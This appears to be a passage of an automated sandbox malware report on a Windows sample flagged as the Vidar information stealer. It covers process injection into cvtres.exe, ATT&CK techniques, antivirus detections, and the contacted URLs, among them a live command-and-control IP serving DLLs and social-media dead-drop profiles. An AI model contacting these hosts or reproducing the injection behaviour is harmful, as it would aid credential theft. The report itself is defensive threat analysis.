              Source: 0.0.uGfpJynSWM.exe.830000.0.unpack, MJCKVKLUIOR/MJCKVKLUIOR.csReference to suspicious API methods: ('\\x08', 'GetProcAddress@kernel32'), ('\t', 'LoadLibraryA@kernel32')
              Source: 0.0.uGfpJynSWM.exe.830000.0.unpack, A/u000f.csReference to suspicious API methods: ('\t', 'GetProcAddress@kernel32.dll'), ('\\x1D', 'OpenProcess@kernel32.dll'), ('\\x08', 'GetProcAddress@kernel32.dll'), ('\\x1A', 'GetProcAddress@kernel32.dll'), ('\\x03', 'LoadLibrary@kernel32.dll'), ('\\x18', 'GetProcAddress@kernel32.dll'), ('\\x11', 'GetProcAddress@kernel32.dll'), ('\\x15', 'GetProcAddress@kernel32.dll')
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
              Source: uGfpJynSWM.exe, 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeQueries volume information: C:\Users\user\Desktop\uGfpJynSWM.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,1_2_0042E8D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_0042A969
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,1_2_0041593C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_0042E9B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_0042A249
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_0042AA5E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,1_2_00429283
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_0042AB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,1_2_0042AB05
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,1_2_00421BE1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_0042AD31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_0042A537
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_004295ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_0042ADF1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_0042AE58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: GetLocaleInfoA,1_2_00422ED2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,1_2_0042AE94
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00415890 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,1_2_00415890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00415890 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,1_2_00415890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040BE20 GetUserNameA,ExitProcess,1_2_0040BE20

              Stealing of Sensitive Information

              barindex
              Yara detected Vidar stealer
              Source: Yara matchFile source: 0.2.uGfpJynSWM.exe.3be5530.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.uGfpJynSWM.exe.3be5530.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: uGfpJynSWM.exe PID: 6360, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 6392, type: MEMORYSTR
              Source: Yara matchFile source: 00000001.00000002.594144374.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected Vidar stealer
              Source: Yara matchFile source: 0.2.uGfpJynSWM.exe.3be5530.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.uGfpJynSWM.exe.3be5530.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: uGfpJynSWM.exe PID: 6360, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 6392, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Native API              		Path Interception312
              Process Injection              		11
              Masquerading              		1
              Input Capture              		2
              System Time Discovery              		Remote Services1
              Screen Capture              		Exfiltration Over Other Network Medium21
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Disable or Modify Tools              		LSASS Memory131
              Security Software Discovery              		Remote Desktop Protocol1
              Input Capture              		Exfiltration Over Bluetooth2
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
              Virtualization/Sandbox Evasion              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares1
              Archive Collected Data              		Automated Exfiltration2
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)312
              Process Injection              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer13
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common4
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items3
              Software Packing              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
              File and Directory Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow24
              System Information Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              uGfpJynSWM.exe68%VirustotalBrowse
              uGfpJynSWM.exe31%MetadefenderBrowse
              uGfpJynSWM.exe81%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              uGfpJynSWM.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              1.0.cvtres.exe.400000.0.unpack100%AviraTR/AD.GenSteal.nsaqrDownload File
              1.0.cvtres.exe.400000.3.unpack100%AviraTR/AD.GenSteal.nsaqrDownload File
              1.0.cvtres.exe.400000.4.unpack100%AviraTR/AD.GenSteal.nsaqrDownload File
              0.2.uGfpJynSWM.exe.3be5530.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.cvtres.exe.400000.2.unpack100%AviraTR/AD.GenSteal.nsaqrDownload File
              1.0.cvtres.exe.400000.1.unpack100%AviraTR/AD.GenSteal.nsaqrDownload File
              1.0.cvtres.exe.400000.5.unpack100%AviraTR/AD.GenSteal.nsaqrDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://climatejustice.social;0%Avira URL Cloudsafe
              https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social0%Avira URL Cloudsafe
              http://45.159.249.4/1474h.dll100%Avira URL Cloudmalware
              http://45.159.249.4/1474stem32100%Avira URL Cloudmalware
              https://climatejustice.social0%Avira URL Cloudsafe
              http://45.159.249.4/1474N100%Avira URL Cloudmalware
              http://45.159.249.4/=:100%Avira URL Cloudmalware
              https://funk.climatejustice.global0%Avira URL Cloudsafe
              https://climatejustice.social/@ffoleg94100%Avira URL Cloudmalware
              https://climatejustice.social/users/ffoleg94/followers0%Avira URL Cloudsafe
              http://45.159.249.4/1474100%Avira URL Cloudmalware
              http://45.159.249.4/147474R100%Avira URL Cloudmalware
              http://45.159.249.4/1474b100%Avira URL Cloudmalware
              https://climatejustice.social/users/ffoleg94/following0%Avira URL Cloudsafe
              https://climatejustice.social/custom.css0%Avira URL Cloudsafe
              http://45.159.249.4/1474l100%Avira URL Cloudmalware
              https://climatejustice.social/tags/grunewald&quot;0%Avira URL Cloudsafe
              https://climatejustice.rocks0%Avira URL Cloudsafe
              http://45.159.249.4/1474u100%Avira URL Cloudmalware
              https://climatejustice.social/avatars/original/missing.png0%Avira URL Cloudsafe
              https://climatejustice.social/tags/gitlab&quot;0%Avira URL Cloudsafe
              https://climatejustice.social/users/ffoleg940%Avira URL Cloudsafe
              http://crl.microsoft.c0%Avira URL Cloudsafe
              https://climatejustice.social/tags/gitea&quot;0%Avira URL Cloudsafe
              https://climatejustice.social/0%Avira URL Cloudsafe
              http://45.159.249.4/1474x100%Avira URL Cloudmalware
              https://climatejustice.global0%Avira URL Cloudsafe
              http://45.159.249.4:80100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              t.me
              		149.154.167.99
              		truefalse
                		high
                climatejustice.social
                		167.86.107.75
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://climatejustice.social/@ffoleg94true
                  • Avira URL Cloud: malware
                  		unknown
                  https://t.me/korstonsalesfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://climatejustice.social;cvtres.exe, 00000001.00000003.341135942.0000000004D07000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.socialcvtres.exe, 00000001.00000003.526458800.0000000004D54000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594549794.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341127759.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572585218.0000000004D75000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594578967.0000000004D75000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341146688.0000000004D09000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594439750.0000000004D06000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341135942.0000000004D07000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://45.159.249.4/1474h.dllcvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://web.telegram.orgcvtres.exe, 00000001.00000003.386988114.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433280864.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://45.159.249.4/1474stem32cvtres.exe, 00000001.00000002.594439750.0000000004D06000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://climatejustice.socialcvtres.exe, 00000001.00000003.341135942.0000000004D07000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://45.159.249.4/1474Ncvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://telegram.org/img/t_logo.pngcvtres.exe, 00000001.00000003.433280864.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://45.159.249.4/=:cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://funk.climatejustice.globalcvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://t.me/korstonsaleshttps://climatejustice.social/uGfpJynSWM.exe, 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                          		high
                          https://climatejustice.social/users/ffoleg94/followerscvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://45.159.249.4/1474cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594536976.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594439750.0000000004D06000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://45.159.249.4/147474Rcvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://45.159.249.4/1474bcvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://github.com/mastodon/mastodoncvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://climatejustice.social/users/ffoleg94/followingcvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://joinmastodon.org/appscvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://climatejustice.social/custom.csscvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594549794.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526464880.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://45.159.249.4/1474lcvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://climatejustice.social/tags/grunewald&quot;cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://docs.joinmastodon.org/client/intro/cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://climatejustice.rockscvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://45.159.249.4/1474ucvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://docs.joinmastodon.org/cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
